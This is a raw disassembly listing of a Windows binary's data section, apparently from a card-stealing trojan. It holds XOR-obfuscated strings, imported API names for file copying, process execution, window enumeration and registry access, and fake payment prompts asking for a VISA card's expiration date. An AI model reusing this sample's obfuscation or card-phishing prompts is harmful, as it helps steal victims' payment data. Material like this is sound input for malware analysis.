aIsequalguid db 'IsEqualGUID',0
dword_44B8DC dd 43400000h, 696E556Fh, 6974696Eh, 7A696C61h ; DATA XREF: sub_442386+87�o
db 65h, 0
word_44B8EE dw 0 ; DATA XREF: sub_442386+6B�o
aCoinitialize db '>CoInitialize',0
word_44B8FE dw 0 ; DATA XREF: sub_442386+4F�o
aCocreateinstan db ']CoCreateInstance',0
word_44B912 dw 0 ; DATA XREF: sub_442386:loc_4423B9�o
aDclsidfromstri db 'dCLSIDFromString',0
byte_44B925 db 2 dup(0), 16h ; DATA XREF: sub_442386+1C�o
aOle32_dll db 'ole32.dll',0
word_44B932 dw 0 ; DATA XREF: sub_442386+1�o
aOle32_dll_0 db 'ole32.dll',0
byte_44B93F db 11h ; DATA XREF: sub_442318+24�o
dd 0ECCB8200h, 0ECF0E7F6h, 0C7A2F6E7h, 0EDEEF2FAh, 0F0E7F0h
dword_44B954 dd 0E2D0001h ; DATA XREF: sub_441FCC+325�o
db 0
byte_44B959 db 1, 0, 0Bh ; DATA XREF: sub_441FCC+2D3�o
db 28h, 0
word_44B95E dw 1 ; DATA XREF: sub_441FCC+24D�o
db 3, 20h, 0
byte_44B963 db 7 ; DATA XREF: sub_441FCC+229�o
dd 3C204800h, 6772383Ch
db 67h, 0
word_44B96E dw 1 ; DATA XREF: sub_441FCC+1E1�o
db 0E3h, 0C0h, 0
byte_44B973 db 7 ; DATA XREF: sub_441FCC:loc_4420FE�o
dd 435F3700h, 180D4743h
db 18h, 0
word_44B97E dw 42Bh ; DATA XREF: sub_441FCC+10�o
dd 969B90F3h, 9D969B90h, 80968183h, 9D9ADD80h, 94D09C95h
dd 83979F9Ch, 0DD9F9F9Ch, 0D09E9C90h, 94879D9Ah, 0DD979F9Ch
dd 0D09E9C90h, 0DD848484h, 0DD819190h, 84D08681h, 80DD8484h
dd 8098909Ch, 0D09092DDh, 819C8780h, 8A92839Eh, 9E9C90DDh
dd 868190D0h, 0DD839C87h, 9DD0869Dh, 96DD8496h, 90DD9494h
dd 84D09E9Ch, 83DD8484h, 9A899D9Ch, 9E929080h, 9C90DD80h
dd 9684D09Eh, 9E9C909Fh, 80DDC096h, 969F9A9Eh, 0DD9C90DDh
dd 9CD09886h, 0DDC1919Fh, 9A87929Dh, 87969D9Ch, 9E9C90DDh
dd 848484D0h, 9A9191DDh, 8681DD9Dh, 80929ED0h, 0DE819687h
dd 9C90DD8Bh, 8484D09Eh, 9C83DD84h, 809A899Dh, 809E9290h
dd 9E9C90DDh, 848484D0h, 9D9291DDh, 9291DE98h, 9686829Dh
dd 9D9290DEh, 0DD929792h, 84D09290h, 83DD8484h, 9A899D9Ch
dd 9E929080h, 9C90DD80h, 8484D09Eh, 9E91DD84h, 9C90DD9Ch
dd 9283D09Eh, 9F92838Ah, 9E9C90DDh, 929196D0h, 9C90DD8Ah
dd 8484D09Eh, 9291DD84h, 959C989Dh, 8697929Eh, 90DD9281h
dd 84D09E9Ch, 90DD8484h, 0DD90919Ah, 0D09E9C90h, 0DD848484h
dd 0DD918785h, 84D08681h, 90DD8484h, 9D929184h, 9C90DD98h
dd 9C94D09Eh, 9C83979Fh, 90DD9F9Fh, 84D09E9Ch, 83DD8484h
dd 9A899D9Ch, 9E929080h, 9C90DD80h, 8484D09Eh, 9E9EDD84h
dd 989D9291h, 0D08681DDh, 0DD848484h, 929A9D86h, 86818780h
dd 8681DD9Eh, 9F9C94D0h, 9F9C8397h, 9C90DD9Fh, 8484D09Eh
dd 9C83DD84h, 809A899Dh, 809E9290h, 9E9C90DDh, 848484D0h
dd 819C84DDh, 9291979Fh, 9CDD989Dh, 84D09481h, 90DD8484h
dd 9A979D92h, 96879297h, 9A819685h, 81969A95h, 9E9C90DDh
dd 848484D0h, 9D9C83DDh, 90809A89h, 0DD809E92h, 0D09E9C90h
dd 0DD848484h, 989D9291h, 9D9A959Ch, 0DD929A97h, 0D09E9C90h
dd 0DD848484h, 9291909Ah, 81DD989Dh, 9291D086h, 9D9A989Dh
dd 929BDD94h, 92959A9Fh, 9D9CDE8Bh, 969D9A9Fh, 0DD9C90DDh
dd 84D09886h, 85DD8484h, 9C979D96h, 929D8081h, 84DD969Eh
dd 8484D080h, 9E98DD84h, 8681DD91h, 848484D0h, 87969DDDh
dd 9A94929Eh, 81968780h, 9E9C90DDh, 859298D0h, 90899298h
dd 96879D96h, 9C90DD81h, 8484D09Eh, 9685DD84h, 819C979Dh
dd 9E929D80h, 8084DD96h, 9C8A9ED0h, 9D9A9F9Dh, 90909296h
dd 879D869Ch, 92DDC180h, 8A969191h, 9A87929Dh, 9F929D9Ch
dd 0DD9C90DDh, 9CD09886h, 9D9A9F9Dh, 8691DE96h, 969D9A80h
dd 9FDD8080h, 978A9C9Fh, 91808780h, 0DD9C90DDh, 84D09886h
dd 92DD8484h, 9B929F9Fh, 97929192h, 989D9291h, 9E9C90DDh
dd 848484D0h, 909181DDh, 9E9C90DDh, 848484D0h, 9D9C83DDh
dd 90809A89h, 0DD809E92h, 0D09E9C90h, 0C2848484h, 91809BDDh
dd 9290DD90h, 919498D0h, 929F9681h, 869F908Bh, 8681DD91h
dd 9E928AD0h, 91DD9C91h, 98D0899Ah, 809C979Ah, 9D9291DEh
dd 8681DD98h, 848484D0h, 90919FDDh, 96819A97h, 9FDD8790h
dd 96818692h, 929A879Dh, 9D92919Dh, 9290DD98h, 819291D0h
dd 8A929F90h, 9C90DD80h, 9C87D09Eh, 9F9F9287h, 9681958Ah
dd 9D929196h, 949D9A98h, 9E9C90DDh, 848484D0h, 90919DDDh
dd 0D09290DDh, 9291C0C6h, 90DD989Dh, 84D09E9Ch, 85DD8484h
dd 9C979D96h, 929D8081h, 84DD969Eh, 8484D080h, 0C191DD84h
dd 8187DE91h, 0DD878086h, 0D09E9C90h, 0DD848484h, 979D9685h
dd 9D80819Ch, 0DD969E92h, 9CD08084h, 919D9683h, 0DD989D92h
dd 0D09E9C90h, 0DE879287h, 8795969Dh, 989D9291h, 0D08681DDh
dd 9F909680h, 81DD9192h, 9680D086h, 9A818690h, 929F8A87h
dd 8681DD91h, 879695D0h, 9781929Bh, 899A91DDh, 9C8194D0h
dd 9F838B9Dh, 87969D92h, 8681DD80h, 9D9685D0h, 80819C97h
dd 969E929Dh, 0D08084DDh
db 0
aClickOnceToCon db 'Click Once To Continue',0 ; DATA XREF: sub_44108E+D8E�o
aButton db 'BUTTON',0 ; DATA XREF: sub_44108E+D93�o
byte_44BDCB db 1Eh ; DATA XREF: sub_44108E+C73�o
dd 28357000h, 31223920h, 3E3F3924h, 24313450h, 7A7A7A35h
dd 503D2431h, 503E3920h, 35343F33h
db 0
byte_44BDED db 6, 0, 69h ; DATA XREF: sub_44108E+C63�o
db ':=(= *',0
aEdit db 'EDIT',0 ; DATA XREF: sub_44108E+C14�o
dword_44BDFC dd 1C2E0006h, 1C000B1Eh ; DATA XREF: sub_44108E+B3B�o
db 5Bh, 0
word_44BE06 dw 4 ; DATA XREF: sub_44108E:loc_441B74�o
dd 9151E3Bh
db 4Eh, 0
byte_44BE0E db 0 ; DATA XREF: sub_44108E+A12�o
; sub_44108E+AA4�o ...
aCombobox db 'COMBOBOX',0 ; DATA XREF: sub_44108E+A17�o
; sub_44108E+AA9�o
dword_44BE18 dd 70230006h, 6A776277h ; DATA XREF: sub_44108E+8A3�o
db 60h, 0
word_44BE22 dw 6Eh ; DATA XREF: sub_44108E:loc_44190B�o
db 40h ; @
db 15h, 2Eh, 21h
a4542Nje30233_0 db '",%`4/`!54(/2):%nJe3`02/#%33).',27h,'`#%.4%2`)3`5.!",%`4/`!54(/2):%`'
db '9/52`#!2$`e3nJ',0Dh,'!+%`#/22%#4)/.3`!.$`429`!',27h,'!).n',0
asc_44BE94 db 0Ah,0 ; DATA XREF: sub_44108E:loc_4418F3�o
dw 1954h
dd 31202735h, 26351726h
db 30h, 0
aVisa db 'VISA',0 ; DATA XREF: sub_44108E+852�o
asc_44BEA7 db ' ',0 ; DATA XREF: sub_44108E+7FF�o
aStatic db 'STATIC',0 ; DATA XREF: sub_44108E+804�o
dword_44BEB0 dd 0A70000h ; DATA XREF: sub_44108E+65B�o
dword_44BEB4 dd 0B8EB0006h, 0A2BFAABFh ; DATA XREF: sub_44108E+64B�o
db 0A8h, 0
word_44BEBE dw 15h ; DATA XREF: sub_44108E+5C5�o
aUuuusmajrrkn_0 db '㓑ㅂ',0
byte_44BED7 db 6 ; DATA XREF: sub_44108E+5B5�o
dd 1A1D4E00h, 0D071A0Fh
db 0
aKkqVx db 'kkq-vx',0 ; DATA XREF: sub_44108E+500�o
aExplorer db 'Explorer',0 ; DATA XREF: sub_44108E+44C�o
asc_44BEF1 db 9,0 ; DATA XREF: sub_44108E:loc_4414BE�o
db 45h
dd 0A262A01h, 26202F27h
db 31h, 0
word_44BEFE dw 0Eh ; DATA XREF: sub_44108E+404�o
dd 67645105h, 616B6C52h, 6946726Ah, 767664h
dword_44BF10 dd 479E0000h, 6F4C7465h, 656C6163h, 6F666E49h ; DATA XREF: sub_440457+499�o
db 41h, 0
word_44BF22 dw 0 ; DATA XREF: sub_440457+47D�o
aOgetversionexa db 'GetVersionExA',0
byte_44BF33 db 0 ; DATA XREF: sub_440457+461�o
dd 69463D00h, 6954656Ch, 6F54656Dh, 74737953h, 69546D65h
db 6Dh, 65h, 0
byte_44BF4B db 0 ; DATA XREF: sub_440457+445�o
dd 6F43D700h, 7261706Dh, 6C694665h, 6D695465h
db 65h, 0
word_44BF5E dw 0 ; DATA XREF: sub_440457+429�o
aRgetvolumeinfo db 'GetVolumeInformationA',0
byte_44BF77 db 0 ; DATA XREF: sub_440457+40D�o
dd 6E490C00h, 6C726574h, 656B636Fh, 63654464h, 656D6572h
db 6Eh, 74h, 0
byte_44BF8F db 0 ; DATA XREF: sub_440457+3F1�o
dd 6E498900h, 6C726574h, 656B636Fh, 636E4964h, 656D6572h
db 6Eh, 74h, 0
byte_44BFA7 db 0 ; DATA XREF: sub_440457+3D5�o
dd 6547A300h, 73795374h, 446D6574h, 63657269h, 79726F74h
db 41h, 0
word_44BFBE dw 0 ; DATA XREF: sub_440457+3B9�o
aLgetmodulefile db 'lGetModuleFileNameA',0
dword_44BFD4 dd 4FDB0000h, 4D6E6570h, 78657475h ; DATA XREF: sub_440457+39D�o
db 41h, 0
word_44BFE2 dw 0 ; DATA XREF: sub_440457+381�o
aRcreatemutexa db 'CreateMutexA',0
word_44BFF2 dw 0 ; DATA XREF: sub_440457+365�o
a0copyfilea db '0CopyFileA',0
byte_44BFFF db 0 ; DATA XREF: sub_440457+349�o
db 0
aGetdiskfreespa db 7,'GetDiskFreeSpaceA',0
dword_44C014 dd 535C0000h, 72457465h, 4D726F72h, 65646Fh ; DATA XREF: sub_440457+32D�o
dword_44C024 dd 476B0000h, 78457465h, 6F437469h, 68546564h, 64616572h
; DATA XREF: sub_440457+311�o
db 0
byte_44C039 db 2 dup(0), 16h ; DATA XREF: sub_440457+2F5�o
aGetdrivetypea db 'GetDriveTypeA',0
word_44C04A dw 0 ; DATA XREF: sub_440457+2D9�o
aUfindclose db 'UFindClose',0
byte_44C057 db 0 ; DATA XREF: sub_440457+2BD�o
dd 6946A700h, 654E646Eh, 69467478h, 41656Ch
dword_44C068 dd 46640000h, 46646E69h, 74737269h, 656C6946h ; DATA XREF: sub_440457+2A1�o
db 41h, 0
word_44C07A dw 0 ; DATA XREF: sub_440457+285�o
aPgettickcount db 'GetTickCount',0
word_44C08A dw 0 ; DATA XREF: sub_440457+269�o
aFrtlzeromemory db 'RtlZeroMemory',0
byte_44C09B db 0 ; DATA XREF: sub_440457+24D�o
dd 6547DC00h, 73795374h, 546D6574h, 656D69h
dword_44C0AC dd 4C640000h, 6C61636Fh, 65657246h ; DATA XREF: sub_440457+231�o
db 0
byte_44C0B9 db 2 dup(0), 79h ; DATA XREF: sub_440457+215�o
aLocalalloc db 'LocalAlloc',0
byte_44C0C7 db 0 ; DATA XREF: sub_440457+1F9�o
dd 69561F00h, 61757472h, 6572466Ch
db 65h, 0
word_44C0D6 dw 0 ; DATA XREF: sub_440457+1DD�o
aUvirtualalloc db 'VirtualAlloc',0
word_44C0E6 dw 0 ; DATA XREF: sub_440457+1C1�o
aReadfile db 0Ah
db 'ReadFile',0
word_44C0F2 dw 0 ; DATA XREF: sub_440457+1A5�o
aCgettemppatha db 'GetTempPathA',0
word_44C102 dw 0 ; DATA XREF: sub_440457+189�o
aGlobalmemoryst db 'GLobalMemoryStatus',0
dword_44C118 dd 4D0D0000h, 69746C75h, 65747942h, 69576F54h, 68436564h
; DATA XREF: sub_440457+16D�o
db 61h, 72h, 0
byte_44C12F db 0 ; DATA XREF: sub_440457+151�o
dd 69571500h, 68436564h, 6F547261h, 746C754Dh, 74794269h
db 65h, 0
word_44C146 dw 0 ; DATA XREF: sub_440457+135�o
aRwinexec db 'RWinExec',0
byte_44C151 db 2 dup(0), 98h ; DATA XREF: sub_440457+119�o
aLstrlenw db 'lstrlenW',0
byte_44C15D db 2 dup(0), 12h ; DATA XREF: sub_440457+FD�o
aGetfilesize db 'GetFileSize',0
dword_44C16C dd 435E0000h, 65736F6Ch, 646E6148h ; DATA XREF: sub_440457+E1�o
db 6Ch, 65h, 0
byte_44C17B db 0 ; DATA XREF: sub_440457+C5�o
dd 7257D800h, 46657469h, 656C69h
dword_44C188 dd 53B50000h, 69467465h, 6F50656Ch, 65746E69h ; DATA XREF: sub_440457+A9�o
db 72h, 0
word_44C19A dw 0 ; DATA XREF: sub_440457+8D�o
aXdeletefilea db 'DeleteFileA',0
byte_44C1A9 db 2 dup(0), 9Bh ; DATA XREF: sub_440457+71�o
aCreatefilea db 'CreateFileA',0
dword_44C1B8 dd 4C050000h, 4C64616Fh, 61726269h, 417972h ; DATA XREF: sub_440457+55�o
dword_44C1C8 dd 47CE0000h, 6F4D7465h, 656C7564h, 646E6148h, 41656Ch
; DATA XREF: sub_440457+39�o
dword_44C1DC dd 42AD0000h, 706565h ; DATA XREF: sub_440457+1D�o
dword_44C1E4 dd 45830000h, 54746978h, 61657268h ; DATA XREF: sub_440457+1�o
db 64h, 0
word_44C1F2 dw 0 ; DATA XREF: sub_44015B+6B�o
aAregclosekey db 'RegCloseKey',0
byte_44C201 db 2 dup(0), 35h ; DATA XREF: sub_44015B+4F�o
aRegqueryvaluee db 'RegQueryValueExA',0
byte_44C215 db 2 dup(0), 8Fh ; DATA XREF: sub_44015B:loc_44018E�o
aRegopenkeyexa db 'RegOpenKeyExA',0
word_44C226 dw 0Ch ; DATA XREF: sub_44015B+1C�o
dd 0E2F0F594h, 0A7FDE4F5h, 0F8F0BAA6h
db 0F8h, 0
word_44C236 dw 0 ; DATA XREF: sub_44015B+1�o
aAdvapi32_dll_0 db ';advapi32.dll',0
word_44C246 dw 1 ; DATA XREF: sub_43F0EA+D21�o
db 0F3h, 8Fh, 0
byte_44C24B db 20h ; DATA XREF: sub_43F0EA+CFB�o
db 7Ch, 0
word_44C24E dw 1 ; DATA XREF: sub_43F0EA+C67�o
db 5Ah, 60h, 0
byte_44C253 db 4 ; DATA XREF: sub_43F0EA:loc_43FD0B�o
dd 7C795900h
db 2Ch, 63h, 0
byte_44C25B db 1 ; DATA XREF: sub_43F0EA+6DE�o
dd 790500h
dword_44C260 dd 0FADA000Ah, 88959CE6h, 0AFFFE097h ; DATA XREF: sub_43F0EA+499�o
db 0E4h, 0
word_44C26E dw 0Bh ; DATA XREF: sub_43F0EA:loc_43F493�o
dd 91EBF7D7h, 929A9685h, 0E9A2F2EDh
db 0
byte_44C27D db 0Ah, 0, 0A4h ; DATA XREF: sub_43F0EA+298�o
dd 0F6E29884h, 9EE1E9E5h, 9AE9h
dword_44C28C dd 4, 4C0022h, 4F0043h, 47h ; DATA XREF: sub_43F0EA+218�o
dword_44C29C dd 5, 0CC00BAh, 0D600DBh, 0DF00CFh ; DATA XREF: sub_43F0EA+201�o
db 2 dup(0)
word_44C2AE dw 2 ; DATA XREF: sub_43EEA0+113�o
dd 0CCCCECh
dword_44C2B4 dd 17380001h ; DATA XREF: sub_43EEA0+DD�o
db 0
byte_44C2B9 db 12h, 0, 31h ; DATA XREF: sub_43EEA0:loc_43EED2�o
dd 4552425Ch, 426E425Dh, 44455045h, 43505342h
db 2, 3, 0
byte_44C2CF db 0Eh ; DATA XREF: sub_43EEA0+10�o
dd 6F5A0E00h, 6067596Ch, 4D79616Ah, 7D7D6F62h
db 0
byte_44C2E1 db 2 dup(0), 75h ; DATA XREF: sub_43EA51+2EF�o
aEnumdesktopwin db 'EnumDesktopWindows',0
byte_44C2F7 db 0 ; DATA XREF: sub_43EA51+2D3�o
dd 69469500h, 6957646Eh, 776F646Eh, 417845h
dword_44C308 dd 54910000h, 736E6172h, 6574616Ch, 7373654Dh, 656761h
; DATA XREF: sub_43EA51+2B7�o
dword_44C31C dd 534A0000h, 57776F68h, 6F646E69h ; DATA XREF: sub_43EA51+29B�o
db 77h, 0
word_44C32A dw 0 ; DATA XREF: sub_43EA51+27F�o
aSetwindowtexta db 'SetWindowTextA',0
dword_44C33C dd 53670000h, 69577465h, 776F646Eh, 676E6F4Ch ; DATA XREF: sub_43EA51+263�o
db 41h, 0
word_44C34E dw 0 ; DATA XREF: sub_43EA51+247�o
dd 746553F4h, 656D6954h
db 72h, 0
word_44C35A dw 0 ; DATA XREF: sub_43EA51+22B�o
dd 746553FBh, 75636F46h
db 73h, 0
word_44C366 dw 0 ; DATA XREF: sub_43EA51+20F�o
aZsendmessagea db 'SendMessageA',0
word_44C376 dw 0 ; DATA XREF: sub_43EA51+1F3�o
aRegisterclassa db 'RegisterClassA',0
dword_44C388 dd 4D690000h, 5765766Fh, 6F646E69h ; DATA XREF: sub_43EA51+1D7�o
db 77h, 0
word_44C396 dw 0 ; DATA XREF: sub_43EA51+1BB�o
aMessageboxa_0 db 'MessageBoxA',0
byte_44C3A5 db 2 dup(0), 0ACh ; DATA XREF: sub_43EA51+19F�o
aLoadicona db 'LoadIconA',0
word_44C3B2 dw 0 ; DATA XREF: sub_43EA51+183�o
dd 616F4CF6h, 72754364h, 41726F73h
db 0
byte_44C3C1 db 2 dup(0), 0C3h ; DATA XREF: sub_43EA51+167�o
aGetwindowtexta db 'GetWindowTextA',0
byte_44C3D3 db 0 ; DATA XREF: sub_43EA51+14B�o
dd 65473900h, 6E695774h, 52776F64h, 746365h
dword_44C3E4 dd 479D0000h, 69577465h, 776F646Eh, 676E6F4Ch ; DATA XREF: sub_43EA51+12F�o
db 41h, 0
word_44C3F6 dw 0 ; DATA XREF: sub_43EA51+113�o
aGetwindow db 'GetWindow',0
byte_44C403 db 0 ; DATA XREF: sub_43EA51+F7�o
dd 65470B00h, 73654D74h, 65676173h
db 41h, 0
word_44C412 dw 0 ; DATA XREF: sub_43EA51+DB�o
aFgetforeground db 'FGetForegroundWindow',0
byte_44C429 db 2 dup(0), 9Fh ; DATA XREF: sub_43EA51+BF�o
aGetclassnamea db 'GetClassNameA',0
word_44C43A dw 0 ; DATA XREF: sub_43EA51+A3�o
dd 73694418h, 63746170h, 73654D68h, 65676173h
db 41h, 0
word_44C44E dw 0 ; DATA XREF: sub_43EA51+87�o
aDestroywindow db 'DestroyWindow',0
byte_44C45F db 0 ; DATA XREF: sub_43EA51+6B�o
dd 65440F00h, 6E695766h, 50776F64h, 41636F72h
db 0
byte_44C471 db 2 dup(0), 0DDh ; DATA XREF: sub_43EA51+4F�o
aCreatewindowex db 'CreateWindowExA',0
dword_44C484 dd 43E20000h, 576C6C61h, 6F646E69h, 6F725077h
; DATA XREF: sub_43EA51:loc_43EA84�o
db 63h, 41h, 0
byte_44C497 db 0Ah ; DATA XREF: sub_43EA51+1C�o
dd 8187F200h, 0C0C18097h, 9E9E96DCh
db 0
byte_44C4A5 db 2 dup(0), 5Ah ; DATA XREF: sub_43EA51+1�o
aUser32_dll_0 db 'user32.dll',0
byte_44C4B3 db 4 ; DATA XREF: sub_43E8A2+3F�o
dd 0B4D6800h
db 52h, 34h, 0
byte_44C4BB db 0 ; DATA XREF: sub_43E5D5:loc_43E841�o
db 0, 9Dh, 0
byte_44C4BF db 1 ; DATA XREF: sub_43E5D5:loc_43E7D7�o
dd 0D0A800h
dword_44C4C4 dd 0E1C40017h, 0E1A7E1A7h, 0E9A7E1A7h, 2 dup(0A7E1A7E1h)
; DATA XREF: sub_43E1CC:loc_43E3C1�o
dd 0A7EAA7E1h
db 0ABh, 0A9h, 0
byte_44C4DF db 16h ; DATA XREF: sub_43E1CC+1AF�o
dd 25634600h, 2 dup(25632563h), 6325636Bh, 63256325h, 33346825h
db 0
byte_44C4F9 db 2 dup(0), 19h ; DATA XREF: sub_43DEF2:loc_43E18E�o
db 5Ch, 0
word_44C4FE dw 4 ; DATA XREF: sub_43DE0F+55�o
aGez db ')',7,'GEZ',0
word_44C506 dw 1 ; DATA XREF: sub_43DE0F+29�o
db 21h, 7Dh, 0
aSS db '%s\%s',0 ; DATA XREF: sub_43DAAC+24F�o
; sub_43DAAC+2B7�o
byte_44C511 db 4, 0, 3 ; DATA XREF: sub_43DAAC+17�o
aP_ db '&p_)',0
align 4
asc_44C51C: ; DATA XREF: sub_43D8A3+19F�o
dw 9
unicode 0, <>,0
dd 610003h, 650066h, 71006Ch, 460066h, 67006Dh
db 2 dup(0)
word_44C536 dw 5Ah ; DATA XREF: sub_43D8A3+111�o
aADakDiseEidkes db 'ф͚ͅ͏͞ЅȞ҅Ȟ˄ȘȞ˂Șˋ'
db 'Ȏ˞Ȟ˞Ș˙ȘˉȞ',0
asc_44C594 db ',',0 ; DATA XREF: sub_43D8A3+BF�o
dw 33Fh
dd 1F585256h, 4B5B5648h, 1F0F0257h, 58565A57h, 0F024B57h
dd 4D505D1Fh, 24D5A5Bh, 4D4C1F0Fh, 4C1A025Ch, 2590010h
dd 15C1Ah
dword_44C5C4 dd 39050007h, 2A393B67h ; DATA XREF: sub_43D8A3+57�o
db 67h, 3Bh, 0
byte_44C5CF db 0 ; DATA XREF: sub_43C38A+759�o
dd 642EC300h, 617461h
dword_44C5D8 dd 270000h ; DATA XREF: sub_43C154:loc_43C1BE�o
dword_44C5DC dd 24010004h, 593931h ; DATA XREF: sub_43BFE5+71�o
dword_44C5E4 dd 89AC0004h, 0F49E82h ; DATA XREF: sub_43BF3D+72�o
dword_44C5EC dd 55700001h ; DATA XREF: sub_43BF3D:loc_43BF9D�o
db 0
byte_44C5F1 db 25h, 63h, 0 ; DATA XREF: sub_43BF3D+4C�o
dword_44C5F4 dd 5C4D0000h ; DATA XREF: sub_43BE25+2D�o
db 0
byte_44C5F9 db 3, 0, 89h ; DATA XREF: sub_43B780+2F6�o
dd 0B4E6B2h
dword_44C600 dd 172C0004h, 11435Fh ; DATA XREF: sub_43B780:loc_43B9E3�o
dword_44C608 dd 0E2D90004h, 0F3E4BDh ; DATA XREF: sub_43B780+216�o
dword_44C610 dd 3, 5A0013h, 54005Eh ; DATA XREF: sub_43B780+16�o
db 2 dup(0)
word_44C61E dw 0Fh ; DATA XREF: sub_43B52C+44�o
dd 7B540227h, 24B4143h, 15145D52h, 4B4B4309h
db 0
byte_44C631 db 0Fh, 0, 5Bh ; DATA XREF: sub_43B52C+1C�o
a0_7Hiu?77 db '~(',7,'0=~.7!hiu?77',0
dword_44C644 dd 2A0F0004h, 53356Ch ; DATA XREF: sub_43B4C6+1C�o
dword_44C64C dd 446A0004h, 190604h ; DATA XREF: sub_43B182+56�o
dword_44C654 dd 0F8A40001h ; DATA XREF: sub_43B182+2A�o
db 0
byte_44C659 db 9, 0, 79h ; DATA XREF: sub_43AFB5+160�o
dd 1D160B29h, 300D1A0Ch
db 1Dh, 0
word_44C666 dw 29h ; DATA XREF: sub_43AFB5+150�o
dd 0C0C9D586h, 0D4C7D1D2h, 0EFCBDAC3h, 0F5E9F4E5h, 0DAF2E0E9h
dd 0E2E8EFD1h, 0DAF5F1E9h, 0F4F4F3C5h, 0D0F2E8E3h, 0EFF5F4E3h
db 0E9h, 0E8h, 0
byte_44C693 db 1 ; DATA XREF: sub_43AFB5+134�o
dd 0BD9300h
dword_44C698 dd 8AA70004h, 89FF82h ; DATA XREF: sub_43AFB5+DA�o
dword_44C6A0 dd 0A0C30003h ; DATA XREF: sub_43AFB5+9C�o
db 0F9h, 9Fh, 0
byte_44C6A7 db 8 ; DATA XREF: sub_43AFB5:loc_43B019�o
dd 93C3E600h, 0C893C3C8h
db 0C3h, 93h, 0
byte_44C6B3 db 2 ; DATA XREF: sub_43AFB5+4F�o
dd 5D470900h
db 0
byte_44C6B9 db 2, 0, 2Ch ; DATA XREF: sub_43AFB5+31�o
db 15h, 74h, 0
byte_44C6BF db 0 ; DATA XREF: sub_43AED7+A3�o
dd 69443900h, 65477073h, 72615074h
db 61h, 6Dh, 0
byte_44C6CF db 0 ; DATA XREF: sub_43AED7+87�o
dd 61564C00h, 6E616972h, 696E4974h
db 74h, 0
word_44C6DE dw 0 ; DATA XREF: sub_43AED7+6B�o
aOvariantclear db 'VariantClear',0
word_44C6EE dw 0 ; DATA XREF: sub_43AED7+4F�o
aSsysfreestring db 'SysFreeString',0
byte_44C6FF db 0 ; DATA XREF: sub_43AED7:loc_43AF0A�o
dd 79530B00h, 6C6C4173h, 7453636Fh, 676E6972h
db 0
byte_44C711 db 2 dup(0), 5Eh ; DATA XREF: sub_43AED7+1C�o
aOleaut32_dll db 'oleaut32.dll',0
byte_44C721 db 2 dup(0), 5Bh ; DATA XREF: sub_43AED7+1�o
aOleaut32_dll_0 db 'oleaut32.dll',0
byte_44C731 db 4, 0, 28h ; DATA XREF: sub_43ADAC+55�o
dd 5B444606h
db 0
byte_44C739 db 1, 0, 6 ; DATA XREF: sub_43ADAC+29�o
db 5Ah, 0
word_44C73E dw 0 ; DATA XREF: sub_43AD5A:loc_43AD8D�o
aMshgetfolderpa db 'mSHGetFolderPathA',0
word_44C752 dw 0 ; DATA XREF: sub_43AD5A+1C�o
aEshell32_dll db 'eshell32.dll',0
byte_44C761 db 2 dup(0), 0A6h ; DATA XREF: sub_43AD5A+1�o
aShell32_dll db 'shell32.dll',0
asc_44C770 db '*',0 ; DATA XREF: sub_43AA99+1DB�o
word_44C772 dw 4 ; DATA XREF: sub_43AA99+9B�o
aQiqqq db '',0
word_44C77A dw 0 ; DATA XREF: sub_43AA12+4F�o
aGetstockobject db 'GetStockObject',0
dword_44C78C dd 43470000h, 74616572h, 6E6F4665h ; DATA XREF: sub_43AA12:loc_43AA45�o
db 74h, 41h, 0
byte_44C79B db 9 ; DATA XREF: sub_43AA12+1C�o
dd 9093F400h, 0DAC6C79Dh, 989890h
dword_44C7A8 dd 67140000h, 32336964h, 6C6C642Eh ; DATA XREF: sub_43AA12+1�o
db 0
byte_44C7B5 db 1, 0, 0D8h ; DATA XREF: sub_43A34D:loc_43A842�o
db 0F8h, 0
word_44C7BA dw 0 ; DATA XREF: sub_43A34D+4AC�o
db 4, 0
word_44C7BE dw 13h ; DATA XREF: sub_43A34D+482�o
aDlijpUeLquvesg db '꿄ʞʋ',0
a5 db '5',0 ; DATA XREF: sub_43A34D+472�o
db 9Ah
dd 0F8FBF4CFh, 0EEBAFFF6h, 0EFFBBAF5h, 0E8F5F2EEh, 0BAFFE0F3h
dd 0D4D3BAB7h, 0C8C8D5D9h, 0BACED9DFh, 0B4D4D3CAh, 0FFF6CABAh
dd 0B6FFE9FBh, 0E8F5F9BAh, 0EEF9FFE8h
db 0B4h, 0
word_44C80E dw 1 ; DATA XREF: sub_43A34D:loc_43A5FF�o
db 4Ch, 61h, 0
aPleaseSelect_0 db 'Please, select Expiration Year',0 ; DATA XREF: sub_43A34D+286�o
word_44C832 dw 1 ; DATA XREF: sub_43A34D:loc_43A54D�o
db 5Ah, 7Ah, 0
aPleaseSelectEx db 'Please, select Expiration Month',0 ; DATA XREF: sub_43A34D+1D4�o
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
; DATA XREF: .data:off_44B1FC�o
db '://',0
dword_44C89C dd 9BA05972h, 11CFF6A8h, 0A00042A4h, 398F0AC9h ; DATA XREF: sub_43FEB1+53�o
dword_44C8AC dd 0FE4106E0h, 11D0399Ah, 0A0008CA4h, 398F0AC9h ; DATA XREF: sub_43FEB1+1D5�o
; sub_43FEB1+1F4�o ...
dword_44C8BC dd 34A715A0h, 11D06587h, 20004A92h, 4DACC7AFh
; DATA XREF: sub_43C0C2:loc_43C10E�o
; sub_43FEB1+14A�o ...
dword_44C8CC dd 3050F25Bh, 11CF98B5h, 0AA0082BBh, 0BCEBD00h
; DATA XREF: sub_4400E0:loc_44012C�o
dword_44C8DC dd 0B196B284h, 101ABAB4h, 0AA009CB6h, 71D3400h ; DATA XREF: sub_4434B2+12�o
dword_44C8EC dd 20400h, 0 ; DATA XREF: sub_43C0C2:loc_43C0EE�o
; sub_4400E0:loc_44010C�o ...
dd 0C0h, 46000000h
dword_44C8FC dd 332C4425h, 11D026CBh, 0C00083B4h, 1901D94Fh ; DATA XREF: sub_43F0EA+174�o
; sub_443E95+14C�o
dword_44C90C dd 3050F1FFh, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; DATA XREF: sub_43B780+123�o
; sub_43F0EA+4DC�o ...
dword_44C91C dd 3050F21Fh, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; DATA XREF: sub_43B780+60�o
; sub_443589+79�o
dword_44C92C dd 3050F1F7h, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; DATA XREF: sub_43F0EA+9CE�o
dword_44C93C dd 3050F240h, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; DATA XREF: sub_43B780+1EC�o
